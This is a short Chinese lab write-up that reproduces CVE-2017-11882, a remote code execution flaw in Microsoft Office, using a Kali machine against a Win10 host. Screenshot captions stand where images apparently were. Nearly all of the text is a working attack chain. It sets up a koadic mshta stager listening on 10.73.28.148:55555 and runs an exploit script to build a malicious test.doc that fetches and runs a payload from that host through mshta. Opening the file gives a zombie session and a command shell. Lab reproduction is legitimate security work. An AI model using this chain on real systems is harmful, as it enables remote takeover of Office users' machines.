实验环境:win10+kali

工具:koadic,Command43b_CVE-2017-11882.py

KALI:

root@kali:/opt/koadic-master# ./koadic

【研究】CVE-2017-11882-Office远程代码执行漏洞复现

(koadic: stager/js/mshta)# set lhost 10.73.28.148

(koadic: stager/js/mshta)# set lport 55555

(koadic: stager/js/mshta)# run

【研究】CVE-2017-11882-Office远程代码执行漏洞复现

 python C:\Users\esafenet\Desktop\Command43b_CVE-2017-11882.py -c "mshta http://10.73.28.148:55555/Vr745" -o test.doc

【研究】CVE-2017-11882-Office远程代码执行漏洞复现

win10上打开test.doc

【研究】CVE-2017-11882-Office远程代码执行漏洞复现

(koadic: stager/js/mshta)# zombies 0

(koadic: stager/js/mshta)# cmdshell 0

【研究】CVE-2017-11882-Office远程代码执行漏洞复现

 

相关文章: